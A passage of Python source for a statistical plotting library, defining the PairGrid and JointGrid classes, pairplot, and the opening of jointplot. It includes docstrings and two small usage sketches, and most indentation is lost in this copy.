if self._col_wrap is None:
return self.axes[-1, :].flat
else:
axes = []
n_empty = self._nrow * self._ncol - self._n_facets
for i, ax in enumerate(self.axes):
append = (
i >= (self._ncol * (self._nrow - 1))
or i >= (self._ncol * (self._nrow - 1) - n_empty)
)
if append:
axes.append(ax)
return np.array(axes, object).flat
@property
def _not_bottom_axes(self):
"""Return a flat array of axes that aren't on the bottom row."""
if self._col_wrap is None:
return self.axes[:-1, :].flat
else:
axes = []
n_empty = self._nrow * self._ncol - self._n_facets
for i, ax in enumerate(self.axes):
append = (
i < (self._ncol * (self._nrow - 1))
and i < (self._ncol * (self._nrow - 1) - n_empty)
)
if append:
axes.append(ax)
return np.array(axes, object).flat
class PairGrid(Grid):
"""Subplot grid for plotting pairwise relationships in a dataset.
This object maps each variable in a dataset onto a column and row in a
grid of multiple axes. Different axes-level plotting functions can be
used to draw bivariate plots in the upper and lower triangles, and the
    marginal distribution of each variable can be shown on the diagonal.
Several different common plots can be generated in a single line using
:func:`pairplot`. Use :class:`PairGrid` when you need more flexibility.
See the :ref:`tutorial <grid_tutorial>` for more information.
"""
@_deprecate_positional_args
def __init__(
self, data, *,
hue=None, hue_order=None, palette=None,
hue_kws=None, vars=None, x_vars=None, y_vars=None,
corner=False, diag_sharey=True, height=2.5, aspect=1,
layout_pad=.5, despine=True, dropna=False, size=None
):
"""Initialize the plot figure and PairGrid object.
Parameters
----------
data : DataFrame
Tidy (long-form) dataframe where each column is a variable and
each row is an observation.
hue : string (variable name)
Variable in ``data`` to map plot aspects to different colors. This
variable will be excluded from the default x and y variables.
hue_order : list of strings
Order for the levels of the hue variable in the palette
palette : dict or seaborn color palette
Set of colors for mapping the ``hue`` variable. If a dict, keys
should be values in the ``hue`` variable.
hue_kws : dictionary of param -> list of values mapping
Other keyword arguments to insert into the plotting call to let
other plot attributes vary across levels of the hue variable (e.g.
the markers in a scatterplot).
vars : list of variable names
Variables within ``data`` to use, otherwise use every column with
a numeric datatype.
{x, y}_vars : lists of variable names
Variables within ``data`` to use separately for the rows and
columns of the figure; i.e. to make a non-square plot.
corner : bool
If True, don't add axes to the upper (off-diagonal) triangle of the
grid, making this a "corner" plot.
height : scalar
Height (in inches) of each facet.
aspect : scalar
Aspect * height gives the width (in inches) of each facet.
layout_pad : scalar
Padding between axes; passed to ``fig.tight_layout``.
despine : boolean
Remove the top and right spines from the plots.
dropna : boolean
Drop missing values from the data before plotting.
See Also
--------
pairplot : Easily drawing common uses of :class:`PairGrid`.
FacetGrid : Subplot grid for plotting conditional relationships.
Examples
--------
.. include:: ../docstrings/PairGrid.rst
"""
super(PairGrid, self).__init__()
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(UserWarning(msg))
# Sort out the variables that define the grid
numeric_cols = self._find_numeric_cols(data)
if hue in numeric_cols:
numeric_cols.remove(hue)
if vars is not None:
x_vars = list(vars)
y_vars = list(vars)
if x_vars is None:
x_vars = numeric_cols
if y_vars is None:
y_vars = numeric_cols
if np.isscalar(x_vars):
x_vars = [x_vars]
if np.isscalar(y_vars):
y_vars = [y_vars]
self.x_vars = x_vars = list(x_vars)
self.y_vars = y_vars = list(y_vars)
self.square_grid = self.x_vars == self.y_vars
if not x_vars:
raise ValueError("No variables found for grid columns.")
if not y_vars:
raise ValueError("No variables found for grid rows.")
# Create the figure and the array of subplots
figsize = len(x_vars) * height * aspect, len(y_vars) * height
# Disable autolayout so legend_out works
with mpl.rc_context({"figure.autolayout": False}):
fig = plt.figure(figsize=figsize)
axes = fig.subplots(len(y_vars), len(x_vars),
sharex="col", sharey="row",
squeeze=False)
# Possibly remove upper axes to make a corner grid
# Note: setting up the axes is usually the most time-intensive part
# of using the PairGrid. We are foregoing the speed improvement that
# we would get by just not setting up the hidden axes so that we can
# avoid implementing fig.subplots ourselves. But worth thinking about.
self._corner = corner
if corner:
hide_indices = np.triu_indices_from(axes, 1)
for i, j in zip(*hide_indices):
axes[i, j].remove()
axes[i, j] = None
self._figure = fig
self.axes = axes
self.data = data
# Save what we are going to do with the diagonal
self.diag_sharey = diag_sharey
self.diag_vars = None
self.diag_axes = None
self._dropna = dropna
# Label the axes
self._add_axis_labels()
# Sort out the hue variable
self._hue_var = hue
if hue is None:
self.hue_names = hue_order = ["_nolegend_"]
self.hue_vals = pd.Series(["_nolegend_"] * len(data),
index=data.index)
else:
# We need hue_order and hue_names because the former is used to control
# the order of drawing and the latter is used to control the order of
# the legend. hue_names can become string-typed while hue_order must
# retain the type of the input data. This is messy but results from
# the fact that PairGrid can implement the hue-mapping logic itself
# (and was originally written exclusively that way) but now can delegate
# to the axes-level functions, while always handling legend creation.
# See GH2307
hue_names = hue_order = categorical_order(data[hue], hue_order)
if dropna:
# Filter NA from the list of unique hue names
hue_names = list(filter(pd.notnull, hue_names))
self.hue_names = hue_names
self.hue_vals = data[hue]
# Additional dict of kwarg -> list of values for mapping the hue var
self.hue_kws = hue_kws if hue_kws is not None else {}
self._orig_palette = palette
self._hue_order = hue_order
self.palette = self._get_palette(data, hue, hue_order, palette)
self._legend_data = {}
# Make the plot look nice
for ax in axes[:-1, :].flat:
if ax is None:
continue
for label in ax.get_xticklabels():
label.set_visible(False)
ax.xaxis.offsetText.set_visible(False)
ax.xaxis.label.set_visible(False)
for ax in axes[:, 1:].flat:
if ax is None:
continue
for label in ax.get_yticklabels():
label.set_visible(False)
ax.yaxis.offsetText.set_visible(False)
ax.yaxis.label.set_visible(False)
self._tight_layout_rect = [.01, .01, .99, .99]
self._tight_layout_pad = layout_pad
self._despine = despine
if despine:
utils.despine(fig=fig)
self.tight_layout(pad=layout_pad)
def map(self, func, **kwargs):
"""Plot with the same function in every subplot.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
row_indices, col_indices = np.indices(self.axes.shape)
indices = zip(row_indices.flat, col_indices.flat)
self._map_bivariate(func, indices, **kwargs)
return self
def map_lower(self, func, **kwargs):
"""Plot with a bivariate function on the lower diagonal subplots.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
indices = zip(*np.tril_indices_from(self.axes, -1))
self._map_bivariate(func, indices, **kwargs)
return self
def map_upper(self, func, **kwargs):
"""Plot with a bivariate function on the upper diagonal subplots.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
indices = zip(*np.triu_indices_from(self.axes, 1))
self._map_bivariate(func, indices, **kwargs)
return self
def map_offdiag(self, func, **kwargs):
"""Plot with a bivariate function on the off-diagonal subplots.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
if self.square_grid:
self.map_lower(func, **kwargs)
if not self._corner:
self.map_upper(func, **kwargs)
else:
indices = []
for i, (y_var) in enumerate(self.y_vars):
for j, (x_var) in enumerate(self.x_vars):
if x_var != y_var:
indices.append((i, j))
self._map_bivariate(func, indices, **kwargs)
return self
def map_diag(self, func, **kwargs):
"""Plot with a univariate function on each diagonal subplot.
Parameters
----------
func : callable plotting function
Must take an x array as a positional argument and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
# Add special diagonal axes for the univariate plot
if self.diag_axes is None:
diag_vars = []
diag_axes = []
for i, y_var in enumerate(self.y_vars):
for j, x_var in enumerate(self.x_vars):
if x_var == y_var:
# Make the density axes
diag_vars.append(x_var)
ax = self.axes[i, j]
diag_ax = ax.twinx()
diag_ax.set_axis_off()
diag_axes.append(diag_ax)
# Work around matplotlib bug
# https://github.com/matplotlib/matplotlib/issues/15188
if not plt.rcParams.get("ytick.left", True):
for tick in ax.yaxis.majorTicks:
tick.tick1line.set_visible(False)
# Remove main y axis from density axes in a corner plot
if self._corner:
ax.yaxis.set_visible(False)
if self._despine:
utils.despine(ax=ax, left=True)
# TODO add optional density ticks (on the right)
# when drawing a corner plot?
if self.diag_sharey and diag_axes:
# This may change in future matplotlibs
# See https://github.com/matplotlib/matplotlib/pull/9923
group = diag_axes[0].get_shared_y_axes()
for ax in diag_axes[1:]:
group.join(ax, diag_axes[0])
self.diag_vars = np.array(diag_vars, np.object_)
self.diag_axes = np.array(diag_axes, np.object_)
if "hue" not in signature(func).parameters:
return self._map_diag_iter_hue(func, **kwargs)
# Loop over diagonal variables and axes, making one plot in each
for var, ax in zip(self.diag_vars, self.diag_axes):
plot_kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
plot_kwargs["ax"] = ax
else:
plt.sca(ax)
vector = self.data[var]
if self._hue_var is not None:
hue = self.data[self._hue_var]
else:
hue = None
if self._dropna:
not_na = vector.notna()
if hue is not None:
not_na &= hue.notna()
vector = vector[not_na]
if hue is not None:
hue = hue[not_na]
plot_kwargs.setdefault("hue", hue)
plot_kwargs.setdefault("hue_order", self._hue_order)
plot_kwargs.setdefault("palette", self._orig_palette)
func(x=vector, **plot_kwargs)
ax.legend_ = None
self._add_axis_labels()
return self
def _map_diag_iter_hue(self, func, **kwargs):
"""Put marginal plot on each diagonal axes, iterating over hue."""
# Plot on each of the diagonal axes
fixed_color = kwargs.pop("color", None)
for var, ax in zip(self.diag_vars, self.diag_axes):
hue_grouped = self.data[var].groupby(self.hue_vals)
plot_kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
plot_kwargs["ax"] = ax
else:
plt.sca(ax)
for k, label_k in enumerate(self._hue_order):
# Attempt to get data for this level, allowing for empty
try:
data_k = hue_grouped.get_group(label_k)
except KeyError:
data_k = pd.Series([], dtype=float)
if fixed_color is None:
color = self.palette[k]
else:
color = fixed_color
if self._dropna:
data_k = utils.remove_na(data_k)
if str(func.__module__).startswith("seaborn"):
func(x=data_k, label=label_k, color=color, **plot_kwargs)
else:
func(data_k, label=label_k, color=color, **plot_kwargs)
self._add_axis_labels()
return self
def _map_bivariate(self, func, indices, **kwargs):
"""Draw a bivariate plot on the indicated axes."""
# This is a hack to handle the fact that new distribution plots don't add
# their artists onto the axes. This is probably superior in general, but
# we'll need a better way to handle it in the axisgrid functions.
from .distributions import histplot, kdeplot
if func is histplot or func is kdeplot:
self._extract_legend_handles = True
kws = kwargs.copy() # Use copy as we insert other kwargs
for i, j in indices:
x_var = self.x_vars[j]
y_var = self.y_vars[i]
ax = self.axes[i, j]
if ax is None: # i.e. we are in corner mode
continue
self._plot_bivariate(x_var, y_var, ax, func, **kws)
self._add_axis_labels()
if "hue" in signature(func).parameters:
self.hue_names = list(self._legend_data)
def _plot_bivariate(self, x_var, y_var, ax, func, **kwargs):
"""Draw a bivariate plot on the specified axes."""
if "hue" not in signature(func).parameters:
self._plot_bivariate_iter_hue(x_var, y_var, ax, func, **kwargs)
return
kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
kwargs["ax"] = ax
else:
plt.sca(ax)
if x_var == y_var:
axes_vars = [x_var]
else:
axes_vars = [x_var, y_var]
if self._hue_var is not None and self._hue_var not in axes_vars:
axes_vars.append(self._hue_var)
data = self.data[axes_vars]
if self._dropna:
data = data.dropna()
x = data[x_var]
y = data[y_var]
if self._hue_var is None:
hue = None
else:
hue = data.get(self._hue_var)
kwargs.setdefault("hue", hue)
kwargs.setdefault("hue_order", self._hue_order)
kwargs.setdefault("palette", self._orig_palette)
func(x=x, y=y, **kwargs)
self._update_legend_data(ax)
def _plot_bivariate_iter_hue(self, x_var, y_var, ax, func, **kwargs):
"""Draw a bivariate plot while iterating over hue subsets."""
kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
kwargs["ax"] = ax
else:
plt.sca(ax)
if x_var == y_var:
axes_vars = [x_var]
else:
axes_vars = [x_var, y_var]
hue_grouped = self.data.groupby(self.hue_vals)
for k, label_k in enumerate(self._hue_order):
kws = kwargs.copy()
# Attempt to get data for this level, allowing for empty
try:
data_k = hue_grouped.get_group(label_k)
except KeyError:
data_k = pd.DataFrame(columns=axes_vars,
dtype=float)
if self._dropna:
data_k = data_k[axes_vars].dropna()
x = data_k[x_var]
y = data_k[y_var]
for kw, val_list in self.hue_kws.items():
kws[kw] = val_list[k]
kws.setdefault("color", self.palette[k])
if self._hue_var is not None:
kws["label"] = label_k
if str(func.__module__).startswith("seaborn"):
func(x=x, y=y, **kws)
else:
func(x, y, **kws)
self._update_legend_data(ax)
def _add_axis_labels(self):
"""Add labels to the left and bottom Axes."""
for ax, label in zip(self.axes[-1, :], self.x_vars):
ax.set_xlabel(label)
for ax, label in zip(self.axes[:, 0], self.y_vars):
ax.set_ylabel(label)
if self._corner:
self.axes[0, 0].set_ylabel("")
def _find_numeric_cols(self, data):
"""Find which variables in a DataFrame are numeric."""
numeric_cols = []
for col in data:
if variable_type(data[col]) == "numeric":
numeric_cols.append(col)
return numeric_cols
class JointGrid(_BaseGrid):
"""Grid for drawing a bivariate plot with marginal univariate plots.
Many plots can be drawn by using the figure-level interface :func:`jointplot`.
Use this class directly when you need more flexibility.
"""
@_deprecate_positional_args
def __init__(
self, *,
x=None, y=None,
data=None,
height=6, ratio=5, space=.2,
dropna=False, xlim=None, ylim=None, size=None, marginal_ticks=False,
hue=None, palette=None, hue_order=None, hue_norm=None,
):
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
# Set up the subplot grid
f = plt.figure(figsize=(height, height))
gs = plt.GridSpec(ratio + 1, ratio + 1)
ax_joint = f.add_subplot(gs[1:, :-1])
ax_marg_x = f.add_subplot(gs[0, :-1], sharex=ax_joint)
ax_marg_y = f.add_subplot(gs[1:, -1], sharey=ax_joint)
self._figure = f
self.ax_joint = ax_joint
self.ax_marg_x = ax_marg_x
self.ax_marg_y = ax_marg_y
# Turn off tick visibility for the measure axis on the marginal plots
plt.setp(ax_marg_x.get_xticklabels(), visible=False)
plt.setp(ax_marg_y.get_yticklabels(), visible=False)
plt.setp(ax_marg_x.get_xticklabels(minor=True), visible=False)
plt.setp(ax_marg_y.get_yticklabels(minor=True), visible=False)
# Turn off the ticks on the density axis for the marginal plots
if not marginal_ticks:
plt.setp(ax_marg_x.yaxis.get_majorticklines(), visible=False)
plt.setp(ax_marg_x.yaxis.get_minorticklines(), visible=False)
plt.setp(ax_marg_y.xaxis.get_majorticklines(), visible=False)
plt.setp(ax_marg_y.xaxis.get_minorticklines(), visible=False)
plt.setp(ax_marg_x.get_yticklabels(), visible=False)
plt.setp(ax_marg_y.get_xticklabels(), visible=False)
plt.setp(ax_marg_x.get_yticklabels(minor=True), visible=False)
plt.setp(ax_marg_y.get_xticklabels(minor=True), visible=False)
ax_marg_x.yaxis.grid(False)
ax_marg_y.xaxis.grid(False)
# Process the input variables
p = VectorPlotter(data=data, variables=dict(x=x, y=y, hue=hue))
plot_data = p.plot_data.loc[:, p.plot_data.notna().any()]
# Possibly drop NA
if dropna:
plot_data = plot_data.dropna()
def get_var(var):
vector = plot_data.get(var, None)
if vector is not None:
vector = vector.rename(p.variables.get(var, None))
return vector
self.x = get_var("x")
self.y = get_var("y")
self.hue = get_var("hue")
for axis in "xy":
name = p.variables.get(axis, None)
if name is not None:
getattr(ax_joint, f"set_{axis}label")(name)
if xlim is not None:
ax_joint.set_xlim(xlim)
if ylim is not None:
ax_joint.set_ylim(ylim)
# Store the semantic mapping parameters for axes-level functions
self._hue_params = dict(palette=palette, hue_order=hue_order, hue_norm=hue_norm)
# Make the grid look nice
utils.despine(f)
if not marginal_ticks:
utils.despine(ax=ax_marg_x, left=True)
utils.despine(ax=ax_marg_y, bottom=True)
for axes in [ax_marg_x, ax_marg_y]:
for axis in [axes.xaxis, axes.yaxis]:
axis.label.set_visible(False)
f.tight_layout()
f.subplots_adjust(hspace=space, wspace=space)
def _inject_kwargs(self, func, kws, params):
"""Add params to kws if they are accepted by func."""
func_params = signature(func).parameters
for key, val in params.items():
if key in func_params:
kws.setdefault(key, val)
def plot(self, joint_func, marginal_func, **kwargs):
"""Draw the plot by passing functions for joint and marginal axes.
This method passes the ``kwargs`` dictionary to both functions. If you
need more control, call :meth:`JointGrid.plot_joint` and
:meth:`JointGrid.plot_marginals` directly with specific parameters.
Parameters
----------
joint_func, marginal_func : callables
Functions to draw the bivariate and univariate plots. See methods
referenced above for information about the required characteristics
of these functions.
kwargs
Additional keyword arguments are passed to both functions.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
self.plot_marginals(marginal_func, **kwargs)
self.plot_joint(joint_func, **kwargs)
return self
def plot_joint(self, func, **kwargs):
"""Draw a bivariate plot on the joint axes of the grid.
Parameters
----------
func : plotting callable
If a seaborn function, it should accept ``x`` and ``y``. Otherwise,
it must accept ``x`` and ``y`` vectors of data as the first two
positional arguments, and it must plot on the "current" axes.
If ``hue`` was defined in the class constructor, the function must
accept ``hue`` as a parameter.
kwargs
            Keyword arguments are passed to the plotting function.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
kwargs["ax"] = self.ax_joint
else:
plt.sca(self.ax_joint)
if self.hue is not None:
kwargs["hue"] = self.hue
self._inject_kwargs(func, kwargs, self._hue_params)
if str(func.__module__).startswith("seaborn"):
func(x=self.x, y=self.y, **kwargs)
else:
func(self.x, self.y, **kwargs)
return self
def plot_marginals(self, func, **kwargs):
"""Draw univariate plots on each marginal axes.
Parameters
----------
func : plotting callable
If a seaborn function, it should accept ``x`` and ``y`` and plot
when only one of them is defined. Otherwise, it must accept a vector
of data as the first positional argument and determine its orientation
using the ``vertical`` parameter, and it must plot on the "current" axes.
If ``hue`` was defined in the class constructor, it must accept ``hue``
as a parameter.
kwargs
            Keyword arguments are passed to the plotting function.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
seaborn_func = (
str(func.__module__).startswith("seaborn")
# deprecated distplot has a legacy API, special case it
and not func.__name__ == "distplot"
)
func_params = signature(func).parameters
kwargs = kwargs.copy()
if self.hue is not None:
kwargs["hue"] = self.hue
self._inject_kwargs(func, kwargs, self._hue_params)
if "legend" in func_params:
kwargs.setdefault("legend", False)
if "orientation" in func_params:
# e.g. plt.hist
orient_kw_x = {"orientation": "vertical"}
orient_kw_y = {"orientation": "horizontal"}
elif "vertical" in func_params:
# e.g. sns.distplot (also how did this get backwards?)
orient_kw_x = {"vertical": False}
orient_kw_y = {"vertical": True}
if seaborn_func:
func(x=self.x, ax=self.ax_marg_x, **kwargs)
else:
plt.sca(self.ax_marg_x)
func(self.x, **orient_kw_x, **kwargs)
if seaborn_func:
func(y=self.y, ax=self.ax_marg_y, **kwargs)
else:
plt.sca(self.ax_marg_y)
func(self.y, **orient_kw_y, **kwargs)
self.ax_marg_x.yaxis.get_label().set_visible(False)
self.ax_marg_y.xaxis.get_label().set_visible(False)
return self
def refline(
self, *, x=None, y=None, joint=True, marginal=True,
color='.5', linestyle='--', **line_kws
):
"""Add a reference line(s) to joint and/or marginal axes.
Parameters
----------
x, y : numeric
Value(s) to draw the line(s) at.
joint, marginal : bools
Whether to add the reference line(s) to the joint/marginal axes.
color : :mod:`matplotlib color <matplotlib.colors>`
Specifies the color of the reference line(s).
linestyle : str
Specifies the style of the reference line(s).
line_kws : key, value mappings
Other keyword arguments are passed to :meth:`matplotlib.axes.Axes.axvline`
when ``x`` is not None and :meth:`matplotlib.axes.Axes.axhline` when ``y``
is not None.
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
line_kws['color'] = color
line_kws['linestyle'] = linestyle
if x is not None:
if joint:
self.ax_joint.axvline(x, **line_kws)
if marginal:
self.ax_marg_x.axvline(x, **line_kws)
if y is not None:
if joint:
self.ax_joint.axhline(y, **line_kws)
if marginal:
self.ax_marg_y.axhline(y, **line_kws)
return self
def set_axis_labels(self, xlabel="", ylabel="", **kwargs):
"""Set axis labels on the bivariate axes.
Parameters
----------
xlabel, ylabel : strings
Label names for the x and y variables.
kwargs : key, value mappings
Other keyword arguments are passed to the following functions:
- :meth:`matplotlib.axes.Axes.set_xlabel`
- :meth:`matplotlib.axes.Axes.set_ylabel`
Returns
-------
:class:`JointGrid` instance
Returns ``self`` for easy method chaining.
"""
self.ax_joint.set_xlabel(xlabel, **kwargs)
self.ax_joint.set_ylabel(ylabel, **kwargs)
return self
JointGrid.__init__.__doc__ = """\
Set up the grid of subplots and store data internally for easy plotting.
Parameters
----------
{params.core.xy}
{params.core.data}
height : number
Size of each side of the figure in inches (it will be square).
ratio : number
Ratio of joint axes height to marginal axes height.
space : number
Space between the joint and marginal axes
dropna : bool
If True, remove missing observations before plotting.
{{x, y}}lim : pairs of numbers
Set axis limits to these values before plotting.
marginal_ticks : bool
If False, suppress ticks on the count/density axis of the marginal plots.
{params.core.hue}
Note: unlike in :class:`FacetGrid` or :class:`PairGrid`, the axes-level
functions must support ``hue`` to use it in :class:`JointGrid`.
{params.core.palette}
{params.core.hue_order}
{params.core.hue_norm}
See Also
--------
{seealso.jointplot}
{seealso.pairgrid}
{seealso.pairplot}
Examples
--------
.. include:: ../docstrings/JointGrid.rst
""".format(
params=_param_docs,
returns=_core_docs["returns"],
seealso=_core_docs["seealso"],
)
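# Illustrative sketch: how JointGrid is typically driven by hand with plain
# matplotlib callables (the non-seaborn code path in plot_joint/plot_marginals
# above). The random data, column names, and helper name are assumptions made
# purely for demonstration; the helper is not called anywhere in this module.
def _jointgrid_usage_sketch():
    """Minimal JointGrid example: scatter on the joint axes, histograms on
    the marginal axes."""
    rng = np.random.RandomState(0)
    df = pd.DataFrame({"x": rng.normal(size=100), "y": rng.normal(size=100)})
    g = JointGrid(data=df, x="x", y="y")
    g.plot_joint(plt.scatter)       # non-seaborn func: drawn via plt.sca()
    g.plot_marginals(plt.hist)      # orientation handled per marginal axis
    return g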
@_deprecate_positional_args
def pairplot(
data, *,
hue=None, hue_order=None, palette=None,
vars=None, x_vars=None, y_vars=None,
kind="scatter", diag_kind="auto", markers=None,
height=2.5, aspect=1, corner=False, dropna=False,
plot_kws=None, diag_kws=None, grid_kws=None, size=None,
):
"""Plot pairwise relationships in a dataset.
By default, this function will create a grid of Axes such that each numeric
    variable in ``data`` will be shared across the y-axes across a single row and
the x-axes across a single column. The diagonal plots are treated
differently: a univariate distribution plot is drawn to show the marginal
distribution of the data in each column.
It is also possible to show a subset of variables or plot different
variables on the rows and columns.
This is a high-level interface for :class:`PairGrid` that is intended to
make it easy to draw a few common styles. You should use :class:`PairGrid`
directly if you need more flexibility.
Parameters
----------
data : `pandas.DataFrame`
Tidy (long-form) dataframe where each column is a variable and
each row is an observation.
hue : name of variable in ``data``
Variable in ``data`` to map plot aspects to different colors.
hue_order : list of strings
Order for the levels of the hue variable in the palette
palette : dict or seaborn color palette
Set of colors for mapping the ``hue`` variable. If a dict, keys
should be values in the ``hue`` variable.
vars : list of variable names
Variables within ``data`` to use, otherwise use every column with
a numeric datatype.
{x, y}_vars : lists of variable names
Variables within ``data`` to use separately for the rows and
columns of the figure; i.e. to make a non-square plot.
kind : {'scatter', 'kde', 'hist', 'reg'}
Kind of plot to make.
diag_kind : {'auto', 'hist', 'kde', None}
Kind of plot for the diagonal subplots. If 'auto', choose based on
whether or not ``hue`` is used.
markers : single matplotlib marker code or list
Either the marker to use for all scatterplot points or a list of markers
with a length the same as the number of levels in the hue variable so that
differently colored points will also have different scatterplot
markers.
height : scalar
Height (in inches) of each facet.
aspect : scalar
Aspect * height gives the width (in inches) of each facet.
corner : bool
If True, don't add axes to the upper (off-diagonal) triangle of the
grid, making this a "corner" plot.
dropna : boolean
Drop missing values from the data before plotting.
{plot, diag, grid}_kws : dicts
Dictionaries of keyword arguments. ``plot_kws`` are passed to the
bivariate plotting function, ``diag_kws`` are passed to the univariate
plotting function, and ``grid_kws`` are passed to the :class:`PairGrid`
constructor.
Returns
-------
grid : :class:`PairGrid`
Returns the underlying :class:`PairGrid` instance for further tweaking.
See Also
--------
PairGrid : Subplot grid for more flexible plotting of pairwise relationships.
JointGrid : Grid for plotting joint and marginal distributions of two variables.
Examples
--------
.. include:: ../docstrings/pairplot.rst
"""
# Avoid circular import
from .distributions import histplot, kdeplot
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
if not isinstance(data, pd.DataFrame):
raise TypeError(
"'data' must be pandas DataFrame object, not: {typefound}".format(
typefound=type(data)))
plot_kws = {} if plot_kws is None else plot_kws.copy()
diag_kws = {} if diag_kws is None else diag_kws.copy()
grid_kws = {} if grid_kws is None else grid_kws.copy()
# Resolve "auto" diag kind
if diag_kind == "auto":
if hue is None:
diag_kind = "kde" if kind == "kde" else "hist"
else:
diag_kind = "hist" if kind == "hist" else "kde"
# Set up the PairGrid
grid_kws.setdefault("diag_sharey", diag_kind == "hist")
grid = PairGrid(data, vars=vars, x_vars=x_vars, y_vars=y_vars, hue=hue,
hue_order=hue_order, palette=palette, corner=corner,
height=height, aspect=aspect, dropna=dropna, **grid_kws)
# Add the markers here as PairGrid has figured out how many levels of the
# hue variable are needed and we don't want to duplicate that process
if markers is not None:
if kind == "reg":
# Needed until regplot supports style
if grid.hue_names is None:
n_markers = 1
else:
n_markers = len(grid.hue_names)
if not isinstance(markers, list):
markers = [markers] * n_markers
if len(markers) != n_markers:
raise ValueError(("markers must be a singleton or a list of "
"markers for each level of the hue variable"))
grid.hue_kws = {"marker": markers}
elif kind == "scatter":
if isinstance(markers, str):
plot_kws["marker"] = markers
elif hue is not None:
plot_kws["style"] = data[hue]
plot_kws["markers"] = markers
# Draw the marginal plots on the diagonal
diag_kws = diag_kws.copy()
diag_kws.setdefault("legend", False)
if diag_kind == "hist":
grid.map_diag(histplot, **diag_kws)
elif diag_kind == "kde":
diag_kws.setdefault("fill", True)
diag_kws.setdefault("warn_singular", False)
grid.map_diag(kdeplot, **diag_kws)
# Maybe plot on the off-diagonals
if diag_kind is not None:
plotter = grid.map_offdiag
else:
plotter = grid.map
if kind == "scatter":
from .relational import scatterplot # Avoid circular import
plotter(scatterplot, **plot_kws)
elif kind == "reg":
from .regression import regplot # Avoid circular import
plotter(regplot, **plot_kws)
elif kind == "kde":
from .distributions import kdeplot # Avoid circular import
plot_kws.setdefault("warn_singular", False)
plotter(kdeplot, **plot_kws)
elif kind == "hist":
from .distributions import histplot # Avoid circular import
plotter(histplot, **plot_kws)
# Add a legend
if hue is not None:
grid.add_legend()
grid.tight_layout()
return grid
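# Illustrative sketch: a typical pairplot call over synthetic data. The column
# names, grouping variable, and helper name are assumptions made purely for
# demonstration; any tidy DataFrame with numeric columns works the same way.
def _pairplot_usage_sketch():
    """Scatter plots off-diagonal, histograms on the diagonal, colored by a
    hue column."""
    rng = np.random.RandomState(0)
    df = pd.DataFrame(rng.normal(size=(200, 3)), columns=["a", "b", "c"])
    df["group"] = np.repeat(["g1", "g2"], 100)
    return pairplot(df, hue="group", kind="scatter", diag_kind="hist")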
@_deprecate_positional_args
def jointplot(
*,
x=None, y=None,
data=None,
kind="scatter", color=None, height=6, ratio=5, space=.2,
dropna=False, xlim=None, ylim=None, marginal_ticks=False,
joint_kws=None, marginal_kws=None,
hue=None, palette=None, hue_order=None, hue_norm=None,
**kwargs
):
# Avoid circular imports
from .relational import scatterplot
from .regression import regplot, residplot
from .distributions import histplot, kdeplot, _freedman_diaconis_bins
# Handle deprecations
if "size" in kwargs:
height = kwargs.pop("size")
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
# Set up empty default kwarg dicts
joint_kws = {} if joint_kws is None else joint_kws.copy()
joint_kws.update(kwargs)
marginal_kws = {} if marginal_kws is None else marginal_kws.copy()
# Handle deprecations of distplot-specific kwargs
distplot_keys = [
"rug", "fit", "hist_kws", "norm_hist" "hist_kws", "rug_kws",
]
unused_keys = []
for key in distplot_keys:
if key in marginal_kws:
unused_keys.append(key)
marginal_kws.pop(key)
if unused_keys and kind != "kde":
msg = (
"The marginal plotting function has changed to `histplot`,"
" which does not accept the following argument(s): {}."
).format(", ".join(unused_keys))
warnings.warn(msg, UserWarning)
# Validate the plot kind
plot_kinds = ["scatter", "hist", "hex", "kde", "reg", "resid"]
_check_argument("kind", plot_kinds, kind)
# Raise early if using `hue` with a kind that does not support it
if hue is not None and kind in ["hex", "reg", "resid"]:
msg = (
f"Use of `hue` with `kind='{kind}'` is not currently supported."
)
raise ValueError(msg)
# Make a colormap based off the plot color
# (Currently used only for kind="hex")
if color is None:
color = "C0"
color_rgb = mpl.colors.colorConverter.to_rgb(color)
colors = [utils.set_hls_values(color_rgb, l=l) # noqa
for l in np.linspace(1, 0, 12)]
cmap = blend_palette(colors, as_cmap=True)
# Matplotlib's hexbin plot is not na-robust
if kind == "hex":
dropna = True
# Initialize the JointGrid object
grid = JointGrid(
data=data, x=x, y=y, hue=hue,
palette=palette, hue_order=hue_order, hue_norm=hue_norm,
dropna=dropna, height=height, ratio=ratio, space=space,
xlim=xlim, ylim=ylim, marginal_ticks=marginal_ticks,
)
if grid.hue is not None:
marginal_kws.setdefault("legend", False)
# Plot the data using the grid
if kind.startswith("scatter"):
joint_kws.setdefault("color", color)
grid.plot_joint(scatterplot, **joint_kws)
if grid.hue is None:
marg_func = histplot
else:
marg_func = kdeplot
marginal_kws.setdefault("warn_singular", False)
marginal_kws.setdefault("fill", True)
marginal_kws.setdefault("color", color)
grid.plot_marginals(marg_func, **marginal_kws)
elif kind.startswith("hist"):
